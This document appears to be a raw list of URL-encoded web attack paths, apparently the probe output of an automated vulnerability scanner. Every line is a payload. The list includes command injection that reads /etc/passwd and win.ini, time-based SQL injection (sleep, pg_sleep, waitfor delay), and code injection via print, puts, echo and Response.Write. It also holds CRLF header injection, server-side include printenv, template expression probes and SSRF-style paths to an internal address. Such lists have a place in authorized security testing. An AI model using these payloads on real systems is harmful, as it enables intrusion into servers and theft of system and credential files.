/
/%0d%0aNeww%3a%20Headerr
/%0d%0aNeww%3a%20Headerr%0d%0a
/%0d%0aNeww%3a%20Headerr%0d%0a/
/%0d%0aNeww%3a%20Headerr/
/%20%252fbin%252fcat%20%252fetc%252fpasswd
/%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/%20%60ping%20-c%206%20localhost%60
/%20%60ping%20-c%206%20localhost%60/
/%20ping%20-c%206%20localhost
/%20ping%20-c%206%20localhost/
/%20ping%20-n%206%20localhost
/%20ping%20-n%206%20localhost/
/%20run%20ping%20-n%206%20localhost
/%20run%20ping%20-n%206%20localhost/
/%20run%20type%20%25SYSTEMROOT%25%5cwin.ini
/%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%20type%20%25SYSTEMROOT%25%5cwin.ini
/%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%22
/%22%20and%20pg_sleep(5)--
/%22%20and%20pg_sleep(5)--/
/%22%20and%20sleep(5)%23
/%22%20and%20sleep(5)%23/
/%22%20and%20sleep(5)%3d%22
/%22%20and%20sleep(5)%3d%22/
/%22%20or%20pg_sleep(5)--
/%22%20or%20pg_sleep(5)--/
/%22%20or%20sleep(5)%23
/%22%20or%20sleep(5)%23/
/%22%20or%20sleep(5)%3d%22
/%22%20or%20sleep(5)%3d%22/
/%22%3becho%201186160%2b1186160%3b%23/
/%22%3becho%201186160%2b1186160%3b/
/%22%3becho%201267644%2b1267644%3b%23/
/%22%3becho%201267644%2b1267644%3b/
/%22%3becho%201971007%2b1971007%3b%23/
/%22%3becho%201971007%2b1971007%3b/
/%22%3becho%202015313%2b2015313%3b%23/
/%22%3becho%202015313%2b2015313%3b/
/%22%3becho%202302003%2b2302003%3b%23/
/%22%3becho%202302003%2b2302003%3b/
/%22%3becho%202737617%2b2737617%3b%23/
/%22%3becho%202737617%2b2737617%3b/
/%22%3becho%203713244%2b3713244%3b%23/
/%22%3becho%203713244%2b3713244%3b/
/%22%3becho%204339639%2b4339639%3b%23/
/%22%3becho%204339639%2b4339639%3b/
/%22%3becho%206751709%2b6751709%3b%23/
/%22%3becho%206751709%2b6751709%3b/
/%22%3becho%209999192%2b9999192%3b
/%22%3becho%209999192%2b9999192%3b%23
/%22%3bimport%20time%3btime.sleep(5)%3b
/%22%3bimport%20time%3btime.sleep(5)%3b%23
/%22%3bimport%20time%3btime.sleep(5)%3b%23/
/%22%3bimport%20time%3btime.sleep(5)%3b/
/%22%3bprint%201186160%2b1186160%23/
/%22%3bprint%201186160%2b1186160%3b%23/
/%22%3bprint%201186160%2b1186160%3b/
/%22%3bprint%201186160%2b1186160/
/%22%3bprint%201267644%2b1267644%23/
/%22%3bprint%201267644%2b1267644%3b%23/
/%22%3bprint%201267644%2b1267644%3b/
/%22%3bprint%201267644%2b1267644/
/%22%3bprint%201971007%2b1971007%23/
/%22%3bprint%201971007%2b1971007%3b%23/
/%22%3bprint%201971007%2b1971007%3b/
/%22%3bprint%201971007%2b1971007/
/%22%3bprint%202015313%2b2015313%23/
/%22%3bprint%202015313%2b2015313%3b%23/
/%22%3bprint%202015313%2b2015313%3b/
/%22%3bprint%202015313%2b2015313/
/%22%3bprint%202302003%2b2302003%23/
/%22%3bprint%202302003%2b2302003%3b%23/
/%22%3bprint%202302003%2b2302003%3b/
/%22%3bprint%202302003%2b2302003/
/%22%3bprint%202737617%2b2737617%23/
/%22%3bprint%202737617%2b2737617%3b%23/
/%22%3bprint%202737617%2b2737617%3b/
/%22%3bprint%202737617%2b2737617/
/%22%3bprint%203713244%2b3713244%23/
/%22%3bprint%203713244%2b3713244%3b%23/
/%22%3bprint%203713244%2b3713244%3b/
/%22%3bprint%203713244%2b3713244/
/%22%3bprint%204339639%2b4339639%23/
/%22%3bprint%204339639%2b4339639%3b%23/
/%22%3bprint%204339639%2b4339639%3b/
/%22%3bprint%204339639%2b4339639/
/%22%3bprint%206751709%2b6751709%23/
/%22%3bprint%206751709%2b6751709%3b%23/
/%22%3bprint%206751709%2b6751709%3b/
/%22%3bprint%206751709%2b6751709/
/%22%3bprint%209999192%2b9999192
/%22%3bprint%209999192%2b9999192%23
/%22%3bprint%209999192%2b9999192%3b
/%22%3bprint%209999192%2b9999192%3b%23
/%22%3bputs%201186160%2b1186160%23/
/%22%3bputs%201186160%2b1186160/
/%22%3bputs%201267644%2b1267644%23/
/%22%3bputs%201267644%2b1267644/
/%22%3bputs%201971007%2b1971007%23/
/%22%3bputs%201971007%2b1971007/
/%22%3bputs%202015313%2b2015313%23/
/%22%3bputs%202015313%2b2015313/
/%22%3bputs%202302003%2b2302003%23/
/%22%3bputs%202302003%2b2302003/
/%22%3bputs%202737617%2b2737617%23/
/%22%3bputs%202737617%2b2737617/
/%22%3bputs%203713244%2b3713244%23/
/%22%3bputs%203713244%2b3713244/
/%22%3bputs%204339639%2b4339639%23/
/%22%3bputs%204339639%2b4339639/
/%22%3bputs%206751709%2b6751709%23/
/%22%3bputs%206751709%2b6751709/
/%22%3bputs%209999192%2b9999192
/%22%3bputs%209999192%2b9999192%23
/%22%3bResponse.Write(1186160%2b1186160)'/
/%22%3bResponse.Write(1186160%2b1186160)/
/%22%3bResponse.Write(1267644%2b1267644)'/
/%22%3bResponse.Write(1267644%2b1267644)/
/%22%3bResponse.Write(1971007%2b1971007)'/
/%22%3bResponse.Write(1971007%2b1971007)/
/%22%3bResponse.Write(2015313%2b2015313)'/
/%22%3bResponse.Write(2015313%2b2015313)/
/%22%3bResponse.Write(2302003%2b2302003)'/
/%22%3bResponse.Write(2302003%2b2302003)/
/%22%3bResponse.Write(2737617%2b2737617)'/
/%22%3bResponse.Write(2737617%2b2737617)/
/%22%3bResponse.Write(3713244%2b3713244)'/
/%22%3bResponse.Write(3713244%2b3713244)/
/%22%3bResponse.Write(4339639%2b4339639)'/
/%22%3bResponse.Write(4339639%2b4339639)/
/%22%3bResponse.Write(6751709%2b6751709)'/
/%22%3bResponse.Write(6751709%2b6751709)/
/%22%3bResponse.Write(9999192%2b9999192)
/%22%3bResponse.Write(9999192%2b9999192)'
/%22%3bsleep(5)%3b
/%22%3bsleep(5)%3b%23
/%22%3bsleep(5)%3b%23/
/%22%3bsleep(5)%3b/
/%22%3bwaitfor%20delay%20'0%3a0%3a5'--
/%22%3bwaitfor%20delay%20'0%3a0%3a5'--/
/%22'%3e%3c!--%23printenv%20--%3e
/%22'%3e%3c!--%23printenv%20--%3e/
/%22)%20and%20pg_sleep(5)--
/%22)%20and%20pg_sleep(5)--/
/%22)%20and%20sleep(5)%3d%22
/%22)%20and%20sleep(5)%3d%22/
/%22)%20or%20pg_sleep(5)--
/%22)%20or%20pg_sleep(5)--/
/%22)%20or%20sleep(5)%3d%22
/%22)%20or%20sleep(5)%3d%22/
/%22)%3bwaitfor%20delay%20'0%3a0%3a5'--
/%22)%3bwaitfor%20delay%20'0%3a0%3a5'--/
/%22))%20and%20pg_sleep(5)--
/%22))%20and%20pg_sleep(5)--/
/%22))%20and%20sleep(5)%3d%22
/%22))%20and%20sleep(5)%3d%22/
/%22))%20or%20pg_sleep(5)--
/%22))%20or%20pg_sleep(5)--/
/%22))%20or%20sleep(5)%3d%22
/%22))%20or%20sleep(5)%3d%22/
/%22))%3bwaitfor%20delay%20'0%3a0%3a5'--
/%22))%3bwaitfor%20delay%20'0%3a0%3a5'--/
/%22/
/%23%5e(%24!%40%24)(()))******
/%23%5e(%24!%40%24)(()))******/
/%24%7b2114103%2b2114103%7d/
/%24%7b2270650%2b2270650%7d/
/%24%7b2614166%2b2614166%7d
/%24%7b2771417%2b2771417%7d/
/%24%7b3085215%2b3085215%7d/
/%24%7b3369999%2b3369999%7d/
/%24%7b4184564%2b4184564%7d/
/%24%7b5814398%2b5814398%7d/
/%24%7b6314460%2b6314460%7d/
/%24%7b7727608%2b7727608%7d/
/%252f%252f192.168.1.104.fpwzyqmc
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%26%26%20ping%20-c%206%20localhost
/%26%26%20ping%20-c%206%20localhost/
/%26%26%20ping%20-n%206%20localhost
/%26%26%20ping%20-n%206%20localhost/
/%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini
/%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%3b%20ping%20-c%206%20localhost
/%3b%20ping%20-c%206%20localhost/
/%3b%20ping%20-n%206%20localhost
/%3b%20ping%20-n%206%20localhost/
/%3b%20type%20%25SYSTEMROOT%25%5cwin.ini
/%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%3becho%201186160%2b1186160%3b%23/
/%3becho%201186160%2b1186160%3b/
/%3becho%201267644%2b1267644%3b%23/
/%3becho%201267644%2b1267644%3b/
/%3becho%201971007%2b1971007%3b%23/
/%3becho%201971007%2b1971007%3b/
/%3becho%202015313%2b2015313%3b%23/
/%3becho%202015313%2b2015313%3b/
/%3becho%202302003%2b2302003%3b%23/
/%3becho%202302003%2b2302003%3b/
/%3becho%202737617%2b2737617%3b%23/
/%3becho%202737617%2b2737617%3b/
/%3becho%203713244%2b3713244%3b%23/
/%3becho%203713244%2b3713244%3b/
/%3becho%204339639%2b4339639%3b%23/
/%3becho%204339639%2b4339639%3b/
/%3becho%206751709%2b6751709%3b%23/
/%3becho%206751709%2b6751709%3b/
/%3becho%209999192%2b9999192%3b
/%3becho%209999192%2b9999192%3b%23
/%3bprint%201186160%2b1186160%23/
/%3bprint%201186160%2b1186160%3b%23/
/%3bprint%201186160%2b1186160%3b/
/%3bprint%201186160%2b1186160/
/%3bprint%201267644%2b1267644%23/
/%3bprint%201267644%2b1267644%3b%23/
/%3bprint%201267644%2b1267644%3b/
/%3bprint%201267644%2b1267644/
/%3bprint%201971007%2b1971007%23/
/%3bprint%201971007%2b1971007%3b%23/
/%3bprint%201971007%2b1971007%3b/
/%3bprint%201971007%2b1971007/
/%3bprint%202015313%2b2015313%23/
/%3bprint%202015313%2b2015313%3b%23/
/%3bprint%202015313%2b2015313%3b/
/%3bprint%202015313%2b2015313/
/%3bprint%202302003%2b2302003%23/
/%3bprint%202302003%2b2302003%3b%23/
/%3bprint%202302003%2b2302003%3b/
/%3bprint%202302003%2b2302003/
/%3bprint%202737617%2b2737617%23/
/%3bprint%202737617%2b2737617%3b%23/
/%3bprint%202737617%2b2737617%3b/
/%3bprint%202737617%2b2737617/
/%3bprint%203713244%2b3713244%23/
/%3bprint%203713244%2b3713244%3b%23/
/%3bprint%203713244%2b3713244%3b/
/%3bprint%203713244%2b3713244/
/%3bprint%204339639%2b4339639%23/
/%3bprint%204339639%2b4339639%3b%23/
/%3bprint%204339639%2b4339639%3b/
/%3bprint%204339639%2b4339639/
/%3bprint%206751709%2b6751709%23/
/%3bprint%206751709%2b6751709%3b%23/
/%3bprint%206751709%2b6751709%3b/
/%3bprint%206751709%2b6751709/
/%3bprint%209999192%2b9999192
/%3bprint%209999192%2b9999192%23
/%3bprint%209999192%2b9999192%3b
/%3bprint%209999192%2b9999192%3b%23
/%3bputs%201186160%2b1186160%23/
/%3bputs%201186160%2b1186160/
/%3bputs%201267644%2b1267644%23/
/%3bputs%201267644%2b1267644/
/%3bputs%201971007%2b1971007%23/
/%3bputs%201971007%2b1971007/
/%3bputs%202015313%2b2015313%23/
/%3bputs%202015313%2b2015313/
/%3bputs%202302003%2b2302003%23/
/%3bputs%202302003%2b2302003/
/%3bputs%202737617%2b2737617%23/
/%3bputs%202737617%2b2737617/
/%3bputs%203713244%2b3713244%23/
/%3bputs%203713244%2b3713244/
/%3bputs%204339639%2b4339639%23/
/%3bputs%204339639%2b4339639/
/%3bputs%206751709%2b6751709%23/
/%3bputs%206751709%2b6751709/
/%3bputs%209999192%2b9999192
/%3bputs%209999192%2b9999192%23
/%3bResponse.Write(1186160%2b1186160)'/
/%3bResponse.Write(1186160%2b1186160)/
/%3bResponse.Write(1267644%2b1267644)'/
/%3bResponse.Write(1267644%2b1267644)/
/%3bResponse.Write(1971007%2b1971007)'/
/%3bResponse.Write(1971007%2b1971007)/
/%3bResponse.Write(2015313%2b2015313)'/
/%3bResponse.Write(2015313%2b2015313)/
/%3bResponse.Write(2302003%2b2302003)'/
/%3bResponse.Write(2302003%2b2302003)/
/%3bResponse.Write(2737617%2b2737617)'/
/%3bResponse.Write(2737617%2b2737617)/
/%3bResponse.Write(3713244%2b3713244)'/
/%3bResponse.Write(3713244%2b3713244)/
/%3bResponse.Write(4339639%2b4339639)'/
/%3bResponse.Write(4339639%2b4339639)/
/%3bResponse.Write(6751709%2b6751709)'/
/%3bResponse.Write(6751709%2b6751709)/
/%3bResponse.Write(9999192%2b9999192)
/%3bResponse.Write(9999192%2b9999192)'
/%3bwaitfor%20delay%20'0%3a0%3a5'--
/%3bwaitfor%20delay%20'0%3a0%3a5'--/
/%3c!--%23printenv%20--%3e
/%3c!--%23printenv%20--%3e/
/%3c!--'%22a
/%3c!--'%22a/
/%3ch%20xhx%3dyhy%3e
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%7c%20ping%20-c%206%20localhost
/%7c%20ping%20-c%206%20localhost/
/%7c%20ping%20-n%206%20localhost
/%7c%20ping%20-n%206%20localhost/
/%7c%20type%20%25SYSTEMROOT%25%5cwin.ini
/%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%c2%bf'"(
/%c2%bf'"(/
/'
/'%20and%20pg_sleep(5)--
/'%20and%20pg_sleep(5)--/
/'%20and%20sleep(5)%23
/'%20and%20sleep(5)%23/
/'%20and%20sleep(5)%3d'
/'%20and%20sleep(5)%3d'/
/'%20or%20pg_sleep(5)--
/'%20or%20pg_sleep(5)--/
/'%20or%20sleep(5)%23
/'%20or%20sleep(5)%23/
/'%20or%20sleep(5)%3d'
/'%20or%20sleep(5)%3d'/
/'%3becho%201186160%2b1186160%3b%23/
/'%3becho%201186160%2b1186160%3b/
/'%3becho%201267644%2b1267644%3b%23/
/'%3becho%201267644%2b1267644%3b/
/'%3becho%201971007%2b1971007%3b%23/
/'%3becho%201971007%2b1971007%3b/
/'%3becho%202015313%2b2015313%3b%23/
/'%3becho%202015313%2b2015313%3b/
/'%3becho%202302003%2b2302003%3b%23/
/'%3becho%202302003%2b2302003%3b/
/'%3becho%202737617%2b2737617%3b%23/
/'%3becho%202737617%2b2737617%3b/
/'%3becho%203713244%2b3713244%3b%23/
/'%3becho%203713244%2b3713244%3b/
/'%3becho%204339639%2b4339639%3b%23/
/'%3becho%204339639%2b4339639%3b/
/'%3becho%206751709%2b6751709%3b%23/
/'%3becho%206751709%2b6751709%3b/
/'%3becho%209999192%2b9999192%3b
/'%3becho%209999192%2b9999192%3b%23
/'%3bimport%20time%3btime.sleep(5)%3b
/'%3bimport%20time%3btime.sleep(5)%3b%23
/'%3bimport%20time%3btime.sleep(5)%3b%23/
/'%3bimport%20time%3btime.sleep(5)%3b/
/'%3bprint%201186160%2b1186160%23/
/'%3bprint%201186160%2b1186160%3b%23/
/'%3bprint%201186160%2b1186160%3b/
/'%3bprint%201186160%2b1186160/
/'%3bprint%201267644%2b1267644%23/
/'%3bprint%201267644%2b1267644%3b%23/
/'%3bprint%201267644%2b1267644%3b/
/'%3bprint%201267644%2b1267644/
/'%3bprint%201971007%2b1971007%23/
/'%3bprint%201971007%2b1971007%3b%23/
/'%3bprint%201971007%2b1971007%3b/
/'%3bprint%201971007%2b1971007/
/'%3bprint%202015313%2b2015313%23/
/'%3bprint%202015313%2b2015313%3b%23/
/'%3bprint%202015313%2b2015313%3b/
/'%3bprint%202015313%2b2015313/
/'%3bprint%202302003%2b2302003%23/
/'%3bprint%202302003%2b2302003%3b%23/
/'%3bprint%202302003%2b2302003%3b/
/'%3bprint%202302003%2b2302003/
/'%3bprint%202737617%2b2737617%23/
/'%3bprint%202737617%2b2737617%3b%23/
/'%3bprint%202737617%2b2737617%3b/
/'%3bprint%202737617%2b2737617/
/'%3bprint%203713244%2b3713244%23/
/'%3bprint%203713244%2b3713244%3b%23/
/'%3bprint%203713244%2b3713244%3b/
/'%3bprint%203713244%2b3713244/
/'%3bprint%204339639%2b4339639%23/
/'%3bprint%204339639%2b4339639%3b%23/
/'%3bprint%204339639%2b4339639%3b/
/'%3bprint%204339639%2b4339639/
/'%3bprint%206751709%2b6751709%23/
/'%3bprint%206751709%2b6751709%3b%23/
/'%3bprint%206751709%2b6751709%3b/
/'%3bprint%206751709%2b6751709/
/'%3bprint%209999192%2b9999192
/'%3bprint%209999192%2b9999192%23
/'%3bprint%209999192%2b9999192%3b
/'%3bprint%209999192%2b9999192%3b%23
/'%3bputs%201186160%2b1186160%23/
/'%3bputs%201186160%2b1186160/
/'%3bputs%201267644%2b1267644%23/
/'%3bputs%201267644%2b1267644/
/'%3bputs%201971007%2b1971007%23/
/'%3bputs%201971007%2b1971007/
/'%3bputs%202015313%2b2015313%23/
/'%3bputs%202015313%2b2015313/
/'%3bputs%202302003%2b2302003%23/
/'%3bputs%202302003%2b2302003/
/'%3bputs%202737617%2b2737617%23/
/'%3bputs%202737617%2b2737617/
/'%3bputs%203713244%2b3713244%23/
/'%3bputs%203713244%2b3713244/
/'%3bputs%204339639%2b4339639%23/
/'%3bputs%204339639%2b4339639/
/'%3bputs%206751709%2b6751709%23/
/'%3bputs%206751709%2b6751709/
/'%3bputs%209999192%2b9999192
/'%3bputs%209999192%2b9999192%23
/'%3bResponse.Write(1186160%2b1186160)'/
/'%3bResponse.Write(1186160%2b1186160)/
/'%3bResponse.Write(1267644%2b1267644)'/
/'%3bResponse.Write(1267644%2b1267644)/
/'%3bResponse.Write(1971007%2b1971007)'/
/'%3bResponse.Write(1971007%2b1971007)/
/'%3bResponse.Write(2015313%2b2015313)'/
/'%3bResponse.Write(2015313%2b2015313)/
/'%3bResponse.Write(2302003%2b2302003)'/
/'%3bResponse.Write(2302003%2b2302003)/
/'%3bResponse.Write(2737617%2b2737617)'/
/'%3bResponse.Write(2737617%2b2737617)/
/'%3bResponse.Write(3713244%2b3713244)'/
/'%3bResponse.Write(3713244%2b3713244)/
/'%3bResponse.Write(4339639%2b4339639)'/
/'%3bResponse.Write(4339639%2b4339639)/
/'%3bResponse.Write(6751709%2b6751709)'/
/'%3bResponse.Write(6751709%2b6751709)/
/'%3bResponse.Write(9999192%2b9999192)
/'%3bResponse.Write(9999192%2b9999192)'
/'%3bsleep(5)%3b
/'%3bsleep(5)%3b%23
/'%3bsleep(5)%3b%23/
/'%3bsleep(5)%3b/
/'%3bwaitfor%20delay%20'0%3a0%3a5'--
/'%3bwaitfor%20delay%20'0%3a0%3a5'--/
/')%20and%20pg_sleep(5)--
/')%20and%20pg_sleep(5)--/
/')%20and%20sleep(5)%3d'
/')%20and%20sleep(5)%3d'/
/')%20or%20pg_sleep(5)--
/')%20or%20pg_sleep(5)--/
/')%20or%20sleep(5)%3d'
/')%20or%20sleep(5)%3d'/
/')%3bwaitfor%20delay%20'0%3a0%3a5'--
/')%3bwaitfor%20delay%20'0%3a0%3a5'--/
/'))%20and%20pg_sleep(5)--
/'))%20and%20pg_sleep(5)--/
/'))%20and%20sleep(5)%3d'
/'))%20and%20sleep(5)%3d'/
/'))%20or%20pg_sleep(5)--
/'))%20or%20pg_sleep(5)--/
/'))%20or%20sleep(5)%3d'
/'))%20or%20sleep(5)%3d'/
/'))%3bwaitfor%20delay%20'0%3a0%3a5'--
/'))%3bwaitfor%20delay%20'0%3a0%3a5'--/
/'/
/(
/(/
/)
/)%3bwaitfor%20delay%20'0%3a0%3a5'--
/)%3bwaitfor%20delay%20'0%3a0%3a5'--/
/))%3bwaitfor%20delay%20'0%3a0%3a5'--
/))%3bwaitfor%20delay%20'0%3a0%3a5'--/
/)/
/0-a
/0-a/
/0-b
/0-b/
/1%20and%20pg_sleep(5)--
/1%20and%20pg_sleep(5)--/
/1%20and%20sleep(5)%23
/1%20and%20sleep(5)%23/
/1%20or%20pg_sleep(5)--
/1%20or%20pg_sleep(5)--/
/1%20or%20sleep(5)%23
/1%20or%20sleep(5)%23/
/1%2b2
/1%2b2/
/1)%20and%20pg_sleep(5)--
/1)%20and%20pg_sleep(5)--/
/1)%20and%20sleep(5)%23
/1)%20and%20sleep(5)%23/
/1)%20or%20pg_sleep(5)--
/1)%20or%20pg_sleep(5)--/
/1)%20or%20sleep(5)%23
/1)%20or%20sleep(5)%23/
/1))%20and%20pg_sleep(5)--
/1))%20and%20pg_sleep(5)--/
/1))%20and%20sleep(5)%23
/1))%20and%20sleep(5)%23/
/1))%20or%20pg_sleep(5)--
/1))%20or%20pg_sleep(5)--/
/1))%20or%20sleep(5)%23
/1))%20or%20sleep(5)%23/
/1-1
/1-1/
/11-5
/11-5/
/12-6
/12-6/
/123
/123/
/2%2b1
/2%2b1/
/2%2b6
/2%2b6/
/2-2
/2-2/
/21%20or%205%3d8--
/21%20or%205%3d8--/
/21%20or%207%3d5--
/21%20or%207%3d5--/
/21%20or%207%3d7--
/21%20or%207%3d7--/
/21%20or%208%3d8--
/21%20or%208%3d8--/
/3%2b5
/3%2b5/
/3%2ba
/3%2ba/
/3%2bb
/3%2bb/
/aa%0d%0aNeww%3a%20Headerr
/aa%0d%0aNeww%3a%20Headerr%0d%0a
/aa%0d%0aNeww%3a%20Headerr%0d%0a/
/aa%0d%0aNeww%3a%20Headerr/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_bbbbbbbbbb
/admin%0auploads%0a/should_not_xist_cccccccccc
/admin%0auploads%0a/should_not_xist_hhhhhhhhhhh
/admin%0auploads%0a/should_not_xist_kkkkkkkkkkkk
/admin%0auploads%0a/should_not_xist_ssssssssssssss
/admin%0auploads%0a/should_not_xist_tttttttttttttt
/admin%0auploads%0a/should_not_xist_xxxxxxxxxxxxxxx
/crossdomain.xml%0aadmin.php%0aadmin.aspx%0a
/echo%201186160%2b1186160%3b%23/
/echo%201186160%2b1186160%3b/
/echo%201267644%2b1267644%3b%23/
/echo%201267644%2b1267644%3b/
/echo%201971007%2b1971007%3b%23/
/echo%201971007%2b1971007%3b/
/echo%202015313%2b2015313%3b%23/
/echo%202015313%2b2015313%3b/
/echo%202302003%2b2302003%3b%23/
/echo%202302003%2b2302003%3b/
/echo%202737617%2b2737617%3b%23/
/echo%202737617%2b2737617%3b/
/echo%203713244%2b3713244%3b%23/
/echo%203713244%2b3713244%3b/
/echo%204339639%2b4339639%3b%23/
/echo%204339639%2b4339639%3b/
/echo%206751709%2b6751709%3b%23/
/echo%206751709%2b6751709%3b/
/echo%209999192%2b9999192%3b
/echo%209999192%2b9999192%3b%23
/fpwzyqmc
/hhhh1hhhhhhhh
/http%3a%252f%252f192.168.1.104.fpwzyqmc
/https%3a%252f%252f192.168.1.104.fpwzyqmc
/import%20time%3btime.sleep(5)%3b
/import%20time%3btime.sleep(5)%3b%23
/import%20time%3btime.sleep(5)%3b%23/
/import%20time%3btime.sleep(5)%3b/
/pg_sleep(5)--
/pg_sleep(5)--/
/print%201186160%2b1186160%23/
/print%201186160%2b1186160%3b%23/
/print%201186160%2b1186160%3b/
/print%201186160%2b1186160/
/print%201267644%2b1267644%23/
/print%201267644%2b1267644%3b%23/
/print%201267644%2b1267644%3b/
/print%201267644%2b1267644/
/print%201971007%2b1971007%23/
/print%201971007%2b1971007%3b%23/
/print%201971007%2b1971007%3b/
/print%201971007%2b1971007/
/print%202015313%2b2015313%23/
/print%202015313%2b2015313%3b%23/
/print%202015313%2b2015313%3b/
/print%202015313%2b2015313/
/print%202302003%2b2302003%23/
/print%202302003%2b2302003%3b%23/
/print%202302003%2b2302003%3b/
/print%202302003%2b2302003/
/print%202737617%2b2737617%23/
/print%202737617%2b2737617%3b%23/
/print%202737617%2b2737617%3b/
/print%202737617%2b2737617/
/print%203713244%2b3713244%23/
/print%203713244%2b3713244%3b%23/
/print%203713244%2b3713244%3b/
/print%203713244%2b3713244/
/print%204339639%2b4339639%23/
/print%204339639%2b4339639%3b%23/
/print%204339639%2b4339639%3b/
/print%204339639%2b4339639/
/print%206751709%2b6751709%23/
/print%206751709%2b6751709%3b%23/
/print%206751709%2b6751709%3b/
/print%206751709%2b6751709/
/print%209999192%2b9999192
/print%209999192%2b9999192%23
/print%209999192%2b9999192%3b
/print%209999192%2b9999192%3b%23
/puts%201186160%2b1186160%23/
/puts%201186160%2b1186160/
/puts%201267644%2b1267644%23/
/puts%201267644%2b1267644/
/puts%201971007%2b1971007%23/
/puts%201971007%2b1971007/
/puts%202015313%2b2015313%23/
/puts%202015313%2b2015313/
/puts%202302003%2b2302003%23/
/puts%202302003%2b2302003/
/puts%202737617%2b2737617%23/
/puts%202737617%2b2737617/
/puts%203713244%2b3713244%23/
/puts%203713244%2b3713244/
/puts%204339639%2b4339639%23/
/puts%204339639%2b4339639/
/puts%206751709%2b6751709%23/
/puts%206751709%2b6751709/
/puts%209999192%2b9999192
/puts%209999192%2b9999192%23
/Response.Write(1186160%2b1186160)'/
/Response.Write(1186160%2b1186160)/
/Response.Write(1267644%2b1267644)'/
/Response.Write(1267644%2b1267644)/
/Response.Write(1971007%2b1971007)'/
/Response.Write(1971007%2b1971007)/
/Response.Write(2015313%2b2015313)'/
/Response.Write(2015313%2b2015313)/
/Response.Write(2302003%2b2302003)'/
/Response.Write(2302003%2b2302003)/
/Response.Write(2737617%2b2737617)'/
/Response.Write(2737617%2b2737617)/
/Response.Write(3713244%2b3713244)'/
/Response.Write(3713244%2b3713244)/
/Response.Write(4339639%2b4339639)'/
/Response.Write(4339639%2b4339639)/
/Response.Write(6751709%2b6751709)'/
/Response.Write(6751709%2b6751709)/
/Response.Write(9999192%2b9999192)
/Response.Write(9999192%2b9999192)'
/should_not_xist_aaaaaaaaaa
/should_not_xist_cccccccccc
/should_not_xist_eeeeeeeeeee
/should_not_xist_ggggggggggg
/should_not_xist_llllllllllll
/should_not_xist_mmmmmmmmmmmm
/should_not_xist_uuuuuuuuuuuuuu
/should_not_xist_xxxxxxxxxxxxxxx
/sleep(5)%23
/sleep(5)%23/
/sleep(5)%3b
/sleep(5)%3b%23
/sleep(5)%3b%23/
/sleep(5)%3b/
/UTF-7
/UTF-8
/w%20'eb
/w%22%20%22eb/
/w%22%2b%22eb/
/w%22%7c%7c%22eb/
/w%2b'eb
/w%7c%7c'eb
/w'%20'eb
/w'%20'eb/
/w'%2b'eb
/w'%2b'eb/
/w'%7c%7c'eb
/w'%7c%7c'eb/
/web
/web%0d%0aNeww%3a%20Headerr
/web%0d%0aNeww%3a%20Headerr%0d%0a
/web%0d%0aNeww%3a%20Headerr%0d%0a/
/web%0d%0aNeww%3a%20Headerr/
/web%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/web%20%60ping%20-c%206%20localhost%60
/web%20%60ping%20-c%206%20localhost%60/
/web%20ping%20-c%206%20localhost
/web%20ping%20-c%206%20localhost/
/web%20ping%20-n%206%20localhost
/web%20ping%20-n%206%20localhost/
/web%20run%20ping%20-n%206%20localhost
/web%20run%20ping%20-n%206%20localhost/
/web%20run%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%22%20and%20%22s%22%3d%22r
/web%22%20and%20%22s%22%3d%22r/
/web%22%20and%20%22s%22%3d%22s
/web%22%20and%20%22s%22%3d%22s/
/web%22%20and%20%22t%22%3d%22r
/web%22%20and%20%22t%22%3d%22r/
/web%22%20and%20%22t%22%3d%22t
/web%22%20and%20%22t%22%3d%22t/
/web%22%20and%205%3d8--
/web%22%20and%205%3d8--/
/web%22%20and%207%3d5--
/web%22%20and%207%3d5--/
/web%22%20and%207%3d7--
/web%22%20and%207%3d7--/
/web%22%20and%208%3d8--
/web%22%20and%208%3d8--/
/web%22'%3e%3c!--%23printenv%20--%3e
/web%22'%3e%3c!--%23printenv%20--%3e/
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%26%26%20ping%20-c%206%20localhost
/web%26%26%20ping%20-c%206%20localhost/
/web%26%26%20ping%20-n%206%20localhost
/web%26%26%20ping%20-n%206%20localhost/
/web%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/
